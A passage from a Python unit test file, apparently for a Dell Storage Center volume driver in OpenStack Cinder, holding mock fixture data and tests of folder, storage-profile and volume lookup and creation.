u'enforceReplayCreationTimeout': False,
u'ruleCount': 0,
u'userCreated': True,
u'scSerialNumber': 64702,
u'scName': u'Storage Center 64702',
u'objectType': u'ScReplayProfile',
u'instanceId': u'64702.11',
u'instanceName': u'fc8f2fec-fab2-4e34-9148-c094c913b9a3'}
STORAGE_PROFILE_LIST = [
{u'allowedForFlashOptimized': False,
u'allowedForNonFlashOptimized': True,
u'index': 1,
u'instanceId': u'64158.1',
u'instanceName': u'Recommended',
u'name': u'Recommended',
u'notes': u'',
u'objectType': u'ScStorageProfile',
u'raidTypeDescription': u'RAID 10 Active, RAID 5 or RAID 6 Replay',
u'raidTypeUsed': u'Mixed',
u'scName': u'Storage Center 64158',
u'scSerialNumber': 64158,
u'tiersUsedDescription': u'Tier 1, Tier 2, Tier 3',
u'useTier1Storage': True,
u'useTier2Storage': True,
u'useTier3Storage': True,
u'userCreated': False,
u'volumeCount': 125},
{u'allowedForFlashOptimized': False,
u'allowedForNonFlashOptimized': True,
u'index': 2,
u'instanceId': u'64158.2',
u'instanceName': u'High Priority',
u'name': u'High Priority',
u'notes': u'',
u'objectType': u'ScStorageProfile',
u'raidTypeDescription': u'RAID 10 Active, RAID 5 or RAID 6 Replay',
u'raidTypeUsed': u'Mixed',
u'scName': u'Storage Center 64158',
u'scSerialNumber': 64158,
u'tiersUsedDescription': u'Tier 1',
u'useTier1Storage': True,
u'useTier2Storage': False,
u'useTier3Storage': False,
u'userCreated': False,
u'volumeCount': 0},
{u'allowedForFlashOptimized': False,
u'allowedForNonFlashOptimized': True,
u'index': 3,
u'instanceId': u'64158.3',
u'instanceName': u'Medium Priority',
u'name': u'Medium Priority',
u'notes': u'',
u'objectType': u'ScStorageProfile',
u'raidTypeDescription': u'RAID 10 Active, RAID 5 or RAID 6 Replay',
u'raidTypeUsed': u'Mixed',
u'scName': u'Storage Center 64158',
u'scSerialNumber': 64158,
u'tiersUsedDescription': u'Tier 2',
u'useTier1Storage': False,
u'useTier2Storage': True,
u'useTier3Storage': False,
u'userCreated': False,
u'volumeCount': 0},
{u'allowedForFlashOptimized': True,
u'allowedForNonFlashOptimized': True,
u'index': 4,
u'instanceId': u'64158.4',
u'instanceName': u'Low Priority',
u'name': u'Low Priority',
u'notes': u'',
u'objectType': u'ScStorageProfile',
u'raidTypeDescription': u'RAID 10 Active, RAID 5 or RAID 6 Replay',
u'raidTypeUsed': u'Mixed',
u'scName': u'Storage Center 64158',
u'scSerialNumber': 64158,
u'tiersUsedDescription': u'Tier 3',
u'useTier1Storage': False,
u'useTier2Storage': False,
u'useTier3Storage': True,
u'userCreated': False,
u'volumeCount': 0}]
CGS = [{u'profile':
{u'instanceId': u'65690.4',
u'instanceName': u'0869559e-6881-454e-ba18-15c6726d33c1',
u'objectType': u'ScReplayProfile'},
u'scSerialNumber': 65690,
u'globalIndex': u'65690-4-2',
u'description': u'GUID1-0869559e-6881-454e-ba18-15c6726d33c1',
u'instanceId': u'65690.65690.4.2',
u'scName': u'Storage Center 65690',
u'expires': False,
u'freezeTime': u'2015-09-28T14:00:59-05:00',
u'expireTime': u'1969-12-31T18:00:00-06:00',
u'expectedReplayCount': 2,
u'writesHeldDuration': 19809,
u'replayCount': 2,
u'instanceName': u'Name1',
u'objectType': u'ScReplayConsistencyGroup'},
{u'profile':
{u'instanceId': u'65690.4',
u'instanceName': u'0869559e-6881-454e-ba18-15c6726d33c1',
u'objectType': u'ScReplayProfile'},
u'scSerialNumber': 65690,
u'globalIndex': u'65690-4-3',
u'description': u'GUID2-0869559e-6881-454e-ba18-15c6726d33c1',
u'instanceId': u'65690.65690.4.3',
u'scName': u'Storage Center 65690',
u'expires': False,
u'freezeTime': u'2015-09-28T14:00:59-05:00',
u'expireTime': u'1969-12-31T18:00:00-06:00',
u'expectedReplayCount': 2,
u'writesHeldDuration': 19809,
u'replayCount': 2,
u'instanceName': u'Name2',
u'objectType': u'ScReplayConsistencyGroup'}
]
ISCSI_CONFIG = {
u'initialReadyToTransfer': True,
u'scSerialNumber': 64065,
u'macAddress': u'00c0dd-1da173',
u'instanceId': u'64065.5764839588723573038.6',
u'vlanTagging': False,
u'mapCount': 8,
u'cardModel': u'Qle4062',
u'portNumber': 3260,
u'firstBurstSize': 256,
u'deviceName': u'PCIDEV09',
u'subnetMask': u'255.255.255.0',
u'speed': u'1 Gbps',
u'maximumVlanCount': 0,
u'gatewayIpAddress': u'192.168.0.1',
u'slot': 4,
u'sfpData': u'',
u'dataDigest': False,
u'chapEnabled': False,
u'firmwareVersion': u'03.00.01.77',
u'preferredControllerIndex': 64066,
u'defaultTimeToRetain': 20,
u'objectType': u'ScControllerPortIscsiConfiguration',
u'instanceName': u'5000d31000FCBE43',
u'scName': u'sc64065',
u'revision': u'0',
u'controllerPortIndex': 5764839588723573038,
u'maxBurstSize': 512,
u'targetCount': 20,
u'description': u'QLogic QLE4062 iSCSI Adapter Rev 0 Copper',
u'vlanSupported': True,
u'chapName': u'iqn.2002-03.com.compellent:5000d31000fcbe43',
u'windowSize': 128,
u'vlanId': 0,
u'defaultTimeToWait': 2,
u'headerDigest': False,
u'slotPort': 2,
u'immediateDataWrite': False,
u'storageCenterTargetCount': 20,
u'vlanCount': 0,
u'scsiCommandTimeout': 60,
u'slotType': u'PCI4',
u'ipAddress': u'192.168.0.21',
u'vlanUserPriority': 0,
u'bothCount': 0,
u'initiatorCount': 33,
u'keepAliveTimeout': 30,
u'homeControllerIndex': 64066,
u'chapSecret': u'',
u'maximumTransmissionUnit': 1500}
SCQOS = {u'linkSpeed': u'1 Gbps',
u'numberDevices': 1,
u'bandwidthLimited': False,
u'name': u'Cinder QoS',
u'instanceId': u'64702.2',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'instanceName': u'Cinder QoS',
u'advancedSettings': {u'globalMaxSectorPerIo': 512,
u'destinationMaxSectorCount': 65536,
u'queuePassMaxSectorCount': 65536,
u'destinationMaxIoCount': 18,
u'globalMaxIoCount': 32,
u'queuePassMaxIoCount': 8},
u'objectType': u'ScReplicationQosNode'}
SCREPL = [{u'destinationVolume': {u'instanceId': u'65495.167',
u'instanceName': u'Cinder repl of abcd9'
u'5b2-1284-4cf0-a397-9'
u'70fa6c68092',
u'objectType': u'ScVolume'},
u'instanceId': u'64702.9',
u'scSerialNumber': 64702,
u'syncStatus': u'NotApplicable',
u'objectType': u'ScReplication',
u'sourceStorageCenter': {u'instanceId': u'64702',
u'instanceName': u'Storage Center '
'64702',
u'objectType': u'StorageCenter'},
u'secondaryTransportTypes': [],
u'dedup': False,
u'state': u'Up',
u'replicateActiveReplay': False,
u'qosNode': {u'instanceId': u'64702.2',
u'instanceName': u'Cinder QoS',
u'objectType': u'ScReplicationQosNode'},
u'sourceVolume': {u'instanceId': u'64702.13108',
u'instanceName': u'abcd95b2-1284-4cf0-a397-'
u'970fa6c68092',
u'objectType': u'ScVolume'},
u'type': u'Asynchronous',
u'statusMessage': u'',
u'status': u'Up',
u'syncMode': u'None',
u'stateMessage': u'',
u'managedByLiveVolume': False,
u'destinationScSerialNumber': 65495,
u'pauseAllowed': True,
u'instanceName': u"Replication of 'abcd95b2-1284-4cf0-"
u"a397-970fa6c68092'",
u'simulation': False,
u'transportTypes': [u'FibreChannel'],
u'replicateStorageToLowestTier': True,
u'scName': u'Storage Center 64702',
u'destinationStorageCenter': {u'instanceId': u'65495',
u'instanceName': u'Storage Center'
u' 65495',
u'objectType': u'StorageCenter'}}]
IQN = 'iqn.2002-03.com.compellent:5000D31000000001'
WWN = u'21000024FF30441C'
WWNS = [u'21000024FF30441C',
u'21000024FF30441D']
# Used to test finding no match in find_wwns
WWNS_NO_MATCH = [u'21000024FF30451C',
u'21000024FF30451D']
FLDR_PATH = 'StorageCenter/ScVolumeFolder/'
# Create a Response object that indicates OK
response_ok = models.Response()
response_ok.status_code = 200
response_ok.reason = u'ok'
RESPONSE_200 = response_ok
# Create a Response object that indicates created
response_created = models.Response()
response_created.status_code = 201
response_created.reason = u'created'
RESPONSE_201 = response_created
    # Create a Response object that can indicate a failure, although
    # 204 can also be a success with no content. (Know your calls!)
response_nc = models.Response()
response_nc.status_code = 204
response_nc.reason = u'duplicate'
RESPONSE_204 = response_nc
    # Create a Response object that is a pure error.
response_bad = models.Response()
response_bad.status_code = 400
response_bad.reason = u'bad request'
RESPONSE_400 = response_bad
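# A quick note on how these canned responses are used below: RESPONSE_200
# and RESPONSE_201 stand in for the success paths of HttpClient.get/post,
# while RESPONSE_204 and RESPONSE_400 are returned wherever a test wants
# the helper under test to take its failure path.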
def setUp(self):
super(DellSCSanAPITestCase, self).setUp()
# Configuration is a mock. A mock is pretty much a blank
# slate. I believe mocks done in setUp are not happy time
# mocks. So we just do a few things like driver config here.
self.configuration = mock.Mock()
self.configuration.san_is_local = False
self.configuration.san_ip = "192.168.0.1"
self.configuration.san_login = "admin"
self.configuration.san_password = "mmm"
self.configuration.dell_sc_ssn = 12345
self.configuration.dell_sc_server_folder = 'opnstktst'
self.configuration.dell_sc_volume_folder = 'opnstktst'
# Note that we set this to True even though we do not
# test this functionality. This is sent directly to
# the requests calls as the verify parameter, and since
# that third party library is deeply stubbed out here it
# is not directly testable by this code. Note that if
# this fails the driver fails to even come up.
self.configuration.dell_sc_verify_cert = True
self.configuration.dell_sc_api_port = 3033
self.configuration.iscsi_ip_address = '192.168.1.1'
self.configuration.iscsi_port = 3260
self._context = context.get_admin_context()
self.apiversion = '2.0'
# Set up the StorageCenterApi
self.scapi = dell_storagecenter_api.StorageCenterApi(
self.configuration.san_ip,
self.configuration.dell_sc_api_port,
self.configuration.san_login,
self.configuration.san_password,
self.configuration.dell_sc_verify_cert,
self.apiversion)
# Set up the scapi configuration vars
self.scapi.ssn = self.configuration.dell_sc_ssn
self.scapi.sfname = self.configuration.dell_sc_server_folder
self.scapi.vfname = self.configuration.dell_sc_volume_folder
# Note that we set this to True (or not) on the replication tests.
self.scapi.failed_over = False
self.volid = str(uuid.uuid4())
self.volume_name = "volume" + self.volid
self.repl_name = "Cinder repl of volume" + self.volid
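# Note: every test method below also receives mock_close_connection,
# mock_open_connection and mock_init. They are presumably supplied by
# class-level @mock.patch.object decorators on StorageCenterApi's
# close_connection, open_connection and __init__ (they are not patched
# per test here), so no test ever opens a real connection.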
def test_path_to_array(self,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._path_to_array(u'folder1/folder2/folder3')
expected = [u'folder1', u'folder2', u'folder3']
self.assertEqual(expected, res, 'Unexpected folder path')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_result',
return_value=SC)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_sc(self,
mock_get,
mock_get_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_sc()
mock_get.assert_called_once_with('StorageCenter/StorageCenter')
self.assertTrue(mock_get_result.called)
self.assertEqual(u'64702', res, 'Unexpected SSN')
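# Reminder on argument order: mock.patch.object decorators apply bottom-up,
# so the decorator closest to the def supplies the first mock argument
# (mock_get here), followed by mock_get_result and then the shared
# connection/init mocks.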
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_result',
return_value=None)
def test_find_sc_failure(self,
mock_get_result,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.find_sc)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_folder(self,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._create_folder(
'StorageCenter/ScVolumeFolder',
'',
self.configuration.dell_sc_volume_folder)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.FLDR, res, 'Unexpected Folder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_folder_with_parent(self,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where parent folder name is specified
res = self.scapi._create_folder(
'StorageCenter/ScVolumeFolder', 'parentFolder',
self.configuration.dell_sc_volume_folder)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.FLDR, res, 'Unexpected Folder')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_create_folder_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._create_folder(
'StorageCenter/ScVolumeFolder', '',
self.configuration.dell_sc_volume_folder)
self.assertIsNone(res, 'Test Create folder - None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_path_to_array',
return_value=['Cinder_Test_Folder'])
def test_create_folder_path(self,
mock_path_to_array,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._create_folder_path(
'StorageCenter/ScVolumeFolder',
self.configuration.dell_sc_volume_folder)
mock_path_to_array.assert_called_once_with(
self.configuration.dell_sc_volume_folder)
self.assertTrue(mock_find_folder.called)
self.assertEqual(self.FLDR, res, 'Unexpected ScFolder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_create_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_path_to_array',
return_value=['Cinder_Test_Folder'])
def test_create_folder_path_create_fldr(self,
mock_path_to_array,
mock_find_folder,
mock_create_folder,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where folder is not found and must be created
res = self.scapi._create_folder_path(
'StorageCenter/ScVolumeFolder',
self.configuration.dell_sc_volume_folder)
mock_path_to_array.assert_called_once_with(
self.configuration.dell_sc_volume_folder)
self.assertTrue(mock_find_folder.called)
self.assertTrue(mock_create_folder.called)
self.assertEqual(self.FLDR, res, 'Unexpected ScFolder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_create_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_path_to_array',
return_value=['Cinder_Test_Folder'])
def test_create_folder_path_failure(self,
mock_path_to_array,
mock_find_folder,
mock_create_folder,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where folder is not found, must be created
# and creation fails
res = self.scapi._create_folder_path(
'StorageCenter/ScVolumeFolder',
self.configuration.dell_sc_volume_folder)
mock_path_to_array.assert_called_once_with(
self.configuration.dell_sc_volume_folder)
self.assertTrue(mock_find_folder.called)
self.assertTrue(mock_create_folder.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_result',
return_value=u'devstackvol/fcvm/')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_folder(self,
mock_post,
mock_get_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_folder(
'StorageCenter/ScVolumeFolder',
self.configuration.dell_sc_volume_folder)
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_result.called)
self.assertEqual(u'devstackvol/fcvm/', res, 'Unexpected folder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_result',
return_value=u'devstackvol/fcvm/')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_folder_multi_fldr(self,
mock_post,
mock_get_result,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case for folder path with multiple folders
res = self.scapi._find_folder(
'StorageCenter/ScVolumeFolder',
u'testParentFolder/opnstktst')
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_result.called)
self.assertEqual(u'devstackvol/fcvm/', res, 'Unexpected folder')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_find_folder_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_folder(
'StorageCenter/ScVolumeFolder',
self.configuration.dell_sc_volume_folder)
self.assertIsNone(res, 'Test find folder - None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=None)
def test_find_volume_folder_fail(self,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where _find_volume_folder returns none
res = self.scapi._find_volume_folder(
False)
mock_find_folder.assert_called_once_with(
'StorageCenter/ScVolumeFolder/GetList',
self.configuration.dell_sc_volume_folder)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=FLDR)
def test_find_volume_folder(self,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_volume_folder(
False)
mock_find_folder.assert_called_once_with(
'StorageCenter/ScVolumeFolder/GetList',
self.configuration.dell_sc_volume_folder)
self.assertEqual(self.FLDR, res, 'Unexpected Folder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=STORAGE_PROFILE_LIST)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_storage_profile_fail(self,
mock_json,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where the requested storage profile is not found
res = self.scapi._find_storage_profile("Blah")
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=STORAGE_PROFILE_LIST)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_storage_profile_none(self,
mock_json,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where no storage profile name is specified
res = self.scapi._find_storage_profile(None)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=STORAGE_PROFILE_LIST)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@ddt.data('HighPriority', 'highpriority', 'High Priority')
def test_find_storage_profile(self,
value,
mock_json,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_storage_profile(value)
self.assertIsNotNone(res, 'Expected matching storage profile!')
self.assertEqual(self.STORAGE_PROFILE_LIST[1]['instanceId'],
res.get('instanceId'))
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_create_folder_path',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=None)
def test_find_volume_folder_create_folder(self,
mock_find_folder,
mock_create_folder_path,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where _find_volume_folder returns none and folder must be
# created
res = self.scapi._find_volume_folder(
True)
mock_find_folder.assert_called_once_with(
'StorageCenter/ScVolumeFolder/GetList',
self.configuration.dell_sc_volume_folder)
self.assertTrue(mock_create_folder_path.called)
self.assertEqual(self.FLDR, res, 'Unexpected Folder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_volume',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'unmap_volume',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'map_volume',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SCSERVERS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_init_volume(self,
mock_post,
mock_get_json,
mock_map_volume,
mock_unmap_volume,
mock_get_volume,
mock_close_connection,
mock_open_connection,
mock_init):
self.scapi._init_volume(self.VOLUME)
self.assertTrue(mock_map_volume.called)
self.assertTrue(mock_unmap_volume.called)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_init_volume_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScServer list fails
self.scapi._init_volume(self.VOLUME)
self.assertTrue(mock_post.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'unmap_volume',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'map_volume',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SCSERVERS_DOWN)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_init_volume_servers_down(self,
mock_post,
mock_get_json,
mock_map_volume,
mock_unmap_volume,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScServer Status = Down
self.scapi._init_volume(self.VOLUME)
self.assertFalse(mock_map_volume.called)
self.assertFalse(mock_unmap_volume.called)
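# Taken together with test_init_volume above, _init_volume appears to map
# and then unmap the new volume only when at least one ScServer is Up;
# with every server Down it leaves the volume untouched.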
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_volume(self,
mock_post,
mock_find_volume_folder,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_volume(
self.volume_name,
1)
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
mock_find_volume_folder.assert_called_once_with(True)
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_storage_profile',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=FLDR)
def test_create_volume_storage_profile_missing(self,
mock_find_volume_folder,
mock_find_storage_profile,
mock_close_connection,
mock_open_connection,
mock_init):
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.create_volume,
self.volume_name,
1,
'Blah')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_storage_profile',
return_value=STORAGE_PROFILE_LIST[0])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_volume_storage_profile(self,
mock_post,
mock_find_volume_folder,
mock_find_storage_profile,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
self.scapi.create_volume(
self.volume_name,
1,
'Recommended')
actual = mock_post.call_args[0][1]['StorageProfile']
expected = self.STORAGE_PROFILE_LIST[0]['instanceId']
self.assertEqual(expected, actual)
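# Note: mock_post.call_args[0] is the tuple of positional arguments from
# the last post() call, so [0][1] picks out the second positional argument
# (presumably the request payload dict) and ['StorageProfile'] reads back
# the profile instanceId that create_volume placed in it.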
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_search_for_volume',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_volume_retry_find(self,
mock_post,
mock_find_volume_folder,
mock_get_json,
mock_search_for_volume,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where _search_for_volume is used to retry finding the
# created volume
res = self.scapi.create_volume(
self.volume_name,
1)
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
mock_search_for_volume.assert_called_once_with(self.volume_name)
mock_find_volume_folder.assert_called_once_with(True)
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_vol_folder_fail(self,
mock_post,
mock_find_volume_folder,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test calling create_volume where volume folder does not exist and
# fails to be created
res = self.scapi.create_volume(
self.volume_name,
1)
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
mock_find_volume_folder.assert_called_once_with(True)
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_create_volume_failure(self,
mock_post,
mock_find_volume_folder,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_volume(
self.volume_name,
1)
mock_find_volume_folder.assert_called_once_with(True)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME_LIST)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test__get_volume_list_enforce_vol_fldr(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find volume in the configured volume folder
res = self.scapi._get_volume_list(self.volume_name, None, True)
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.VOLUME_LIST, res, 'Unexpected volume list')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME_LIST)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test__get_volume_list_any_fldr(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find volume anywhere in the configured SC
res = self.scapi._get_volume_list(self.volume_name, None, False)
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.VOLUME_LIST, res, 'Unexpected volume list')
def test_get_volume_list_no_name_no_id(self,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where the specified volume name and device id are both None.
res = self.scapi._get_volume_list(None, None, True)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test__get_volume_list_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where the post for the volume list fails
res = self.scapi._get_volume_list(self.volume_name, None, True)
self.assertTrue(mock_post.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_search_for_volume',
return_value=VOLUME)
def test_find_volume(self,
mock_search_for_volume,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find volume by name
res = self.scapi.find_volume(self.volume_name, None)
mock_search_for_volume.assert_called_once_with(self.volume_name)
self.assertEqual(self.VOLUME, res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_search_for_volume',
return_value=None)
def test_find_volume_not_found(self,
mock_search_for_volume,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find volume by name
res = self.scapi.find_volume(self.volume_name, None)
mock_search_for_volume.assert_called_once_with(self.volume_name)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_volume',
return_value=VOLUME)
def test_find_volume_with_provider_id(self,
mock_get_volume,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
res = self.scapi.find_volume(self.volume_name, provider_id)
mock_get_volume.assert_called_once_with(provider_id)
self.assertEqual(self.VOLUME, res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_volume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_search_for_volume',
return_value=VOLUME)
def test_find_volume_with_invalid_provider_id(self,
mock_search_for_volume,
mock_get_volume,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = 'WrongSSN.1'
res = self.scapi.find_volume(self.volume_name, provider_id)
mock_search_for_volume.assert_called_once_with(self.volume_name)
self.assertFalse(mock_get_volume.called)
self.assertEqual(self.VOLUME, res)
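# The provider_id handling above relies on its '<ssn>.<index>' form: when
# the SSN prefix matches self.scapi.ssn the volume is fetched directly by
# id, and when it does not (e.g. 'WrongSSN.1') find_volume appears to fall
# back to searching by volume name instead.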
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_volume',
return_value=None)
def test_find_volume_with_provider_id_not_found(self,
mock_get_volume,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
res = self.scapi.find_volume(self.volume_name, provider_id)
mock_get_volume.assert_called_once_with(provider_id)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_volume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_import_one',
return_value=VOLUME)
def test_find_volume_with_provider_id_complete_replication(
self,
mock_import_one,
mock_get_volume,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
# Configure to middle of failover.
self.scapi.failed_over = True
mock_get_volume.return_value = {'name': self.repl_name}
res = self.scapi.find_volume(self.volume_name, provider_id)
self.scapi.failed_over = False
mock_import_one.assert_called_once_with(mock_get_volume.return_value,
self.volume_name)
mock_get_volume.assert_called_once_with(provider_id)
self.assertEqual(self.VOLUME, res, 'Unexpected volume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
